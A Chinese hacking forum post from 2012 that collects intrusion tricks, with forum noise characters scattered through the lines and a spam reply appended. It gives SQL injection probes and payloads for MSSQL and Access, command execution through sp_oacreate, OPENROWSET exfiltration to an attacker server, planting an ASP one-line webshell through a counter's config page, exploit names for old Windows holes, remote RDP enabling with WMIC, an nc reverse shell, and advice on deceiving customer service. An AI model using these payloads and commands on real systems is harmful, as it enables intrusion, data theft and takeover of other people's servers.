中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]
作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关- m5 T* j  V& y& x

! r: N; h5 y$ W: g1 K+ Q/ D+ o- Y# \8 _7 h
SA点数据库分离搞法+语句:& Q+ l: O# y$ b3 V7 e

$ o" w' f! n1 ^注射点不显错,执行下面三条语句页面都返回正常。3 K0 \+ N3 L: Y7 R4 p' L% L6 r) e9 N
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')* Z8 c5 s; U9 ^
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')9 w  N; k$ m' _# C; n( @: |! l- |
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
" ^6 j. |& `) j- Q$ E2 D5 M) ^可以列目录,判断系统为2000,web与数据库分离
, @* t* E0 ^4 p: P/ \+ N% g/ d遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。- f1 g" k2 y; C" Z1 ^1 b
在注射点上执行, N7 R- g. r+ ]/ o* w, x- F9 t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
  [! k, T; }( @' H页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
( n: w5 w5 \; t6 }8 c) v还有我用NC监听得其他端口都没有得到IP。
6 M( O/ w  ?9 U' ], C/ x8 }/ w; C; k1 U1 Y. [6 e5 s4 d
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
2 Z7 Y: Y/ j% w6 f9 o9 g: [4 f'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
3 t8 u0 q2 O9 `0 O/ X2 q9 z- I4 a" u7 z' S" t
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
) Z# b4 d) @3 k7 ^. c$ c, i: [: F, X' j( E. D( p
现在就猜想是不是数据库是内网而且不能连外网。
: c0 O" t1 h2 P% I7 n8 ?- G, Q$ m0 \2 d. P+ O
! P6 C7 m0 }/ _* x+ W
access导出txt文本代码7 F$ I) z7 h$ {% O
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin0 h- u) }+ e  K% I" _
# _( P+ V6 x3 h* L, Q- k
, E5 {9 n, t+ g$ U
  X. Q4 Q0 I+ j) N- K. ]
自动跳转到指定网站代码头
% p7 {3 z0 i4 X- w& c- g/ p<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
- ~, R; h! y( M3 m0 W; C! |1 D) I- ^6 B8 b! E. q# |- K

9 M/ l5 z/ U  n) K入侵java or jsp站点时默认配置文件路径:5 d: U. u7 M: j9 A" b
\web-inf\web.xml. E9 y4 O+ C+ R7 O( ?2 R, E" p
tomcat下的配置文件位置:9 `# `; p! T' o2 [- z1 I
\conf\server.xml            (前面加上tomcat路径)
2 G; m% s) `5 G3 n5 K\Tomcat 5.0\webapps\root\web-inf\struts-config.xml" n8 X. f7 o( ^# E- L9 s9 j+ q

$ W0 B0 [0 Y, Y9 T+ D" H0 ^7 {6 k; P" z2 Z) d' U
, X6 b0 Y3 L: u3 f8 ^. c
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:# d( U; V) V3 t8 j1 A
-1%23
( n4 k: x% K2 B# Y- j4 X- I# S9 ?( ~> # T9 d) S! t' \
<
3 g+ `/ R$ V/ ]8 _; h1'+or+'1'='1
% r8 k. V& Z0 V* R8 B" jid=8%bf: F& H. G. M' T) b' l- d0 q7 i
6 T4 [6 i7 a9 a0 O9 r/ m. x
全新注入点检测试法:" T6 I- c" O7 P6 Q: i
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
! l1 a4 X# h+ W& L8 K$ f% Q$ D- D  ?" l
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
5 J5 j6 K/ ^! x. F1 d) k9 W! q# g! s8 |! |8 [9 b' Y( }
搜索型注入判断方法:
5 e! H7 o$ ^; z, S北京%' and '1'='1' and '%'='( |3 T8 v  T+ M' A
北京%' and '1'='2' and '%'='' v2 R% J2 g* C) ~
; L: [) n& p7 r4 f0 w* J
. B" I7 f) N+ R7 M4 h7 ~3 j
COOKIES注入:2 U' m5 ?8 S# i0 T% ?* z+ K

$ h$ @: H9 Q3 v) `javascript:alert(document.cookie="id="+escape("51 and 1=1"));
4 X/ y/ l. H8 e( U9 O; U: f/ m
2000专业版查看本地登录用户命令:
% u  \- [& @( a! f$ E+ anet config workstation
( e- l+ c1 ^& u# s) H
/ X1 L$ ?- j8 w6 H5 M6 N' V* F% p4 ^9 V1 u6 X9 S3 ^; _
2003下查看ipsec配置和默认防火墙配置命令:% j& V! p0 H2 A) i
netsh firewall show config$ c% \# t! M# d' l
netsh ipsec static show all# |$ e- b4 O* L* m% E4 q$ a
8 U, {) y0 r% s" B& ~4 w+ Q
不指派指定策略命令:
# \2 c2 @5 H) ~0 U, o, t  lnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
; r/ l6 {, p- f5 f' Rnetsh ipsec static show policy all  显示策略名
. H: g5 ?8 |; \7 H3 Z" Z- Y( p( U

6 A- e6 ^, S9 [* G猜管理员后台小技巧:4 @2 O8 m- T; c! q: }1 p4 \( @
admin/left.asp
: F! r" g$ f: `, k3 E4 i2 b: kadmin/main.asp
7 C, m. @" v9 \; L* [admin/top.asp# T/ N$ h6 \/ P/ _/ Z+ a
admin/admin.asp
% F4 I6 N+ D; y5 t; e3 R4 i会现出菜单导航,然后迅雷下载全部链接* b1 \7 x& Z6 t# J

* H6 P, V" }' z8 N! O) v2 W% `( |/ k+ p- \: l  u* z
社会工程学:. \* Q( j4 G0 n) U& B
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
0 e4 F* j# A8 o9 `( z* a; l  m然后去骗客服
" {" U. w) I# k% e" i
# [5 f5 M8 c3 L. E3 p& W& f# J, M6 J7 \- \4 w
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: " {# D: H  Y7 L2 Z( p7 S
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
2 i1 V; m% m& ]6 P  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。! b5 J2 g# D4 i! y. {% P

+ ^- a4 ]5 w( o. a$ C6 N
; W  x9 E9 t  p& O6 o1 j& B; U2 I
- r+ }3 N) C2 Q/ d: Y9 K6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
. S6 G0 e6 N# F& M/ E6 s
) ^/ ^; L( A5 A+ C) Y$ o+ c3 z! W+ z% ^* `
, z1 r+ u& h. v
CMD加密注册表位置
1 ]7 x! e2 s) l" d3 i: ~1 s& X(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
) a3 ]* c; q2 TAutoRun
* V+ G) b. @# t, R" f+ p! t2 S7 z/ {& ^4 d
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
! H' R- w- U+ h5 U/ xAutoRun4 G( W2 j  a: T1 i+ R

# I* ~1 j' H8 z+ c0 }* ^: Q6 F: Z  e" K" r* L" B) c1 O9 U2 L3 G
在找注入时搜索Hidden,把他改成test6 _) ]* }8 [6 v' G

3 s2 `! G! X2 `8 H+ q' `' x% v( X% Z

" i1 j2 K7 A0 H* x0 s1 ~mstsc /v:IP /console " ^  y7 J6 D+ K

) a) p( `, ?* o& r4 S% \: n9 w% Y# k$ K. m
一句话开3389:7 h0 r5 d" v. z& ?% O) v
& g* w* z# F5 i: g7 j
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
' v3 S) w3 `" A' ~) \# R开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.7 J- N: E8 f% s3 W8 l

  C( e/ i( T9 h6 e0 x
7 @+ ~: [, E7 S; c9 ]/ K知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
: a( [# b* `- N" }Insert into admin(user,pwd) values('test','test')0 R9 j0 V9 I) u& `

/ q3 ]% Y! a) h8 p8 {& g! A$ b* i- u' \
NC反弹
* x) T( b# b0 h7 x+ F* X5 e1 G先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
, d# c+ q7 V. }0 W/ ~然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
; M2 X' u* |" e) G% a% I% a# y' @
$ @4 S  a9 w6 }2 Y
$ c3 h' {  \% |4 P/ g# F. e+ ?6 `: S在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
$ J! O9 ]3 F* J: v* M
/ I3 H3 f" H7 v8 Q有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录8 b0 |( K9 U0 {3 h
例如:8 t$ F0 d: @2 t# m
subst k: d:\www\ 用d盘www目录替代k盘4 ]3 @- ~* h5 @4 V: Z  Y
subst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2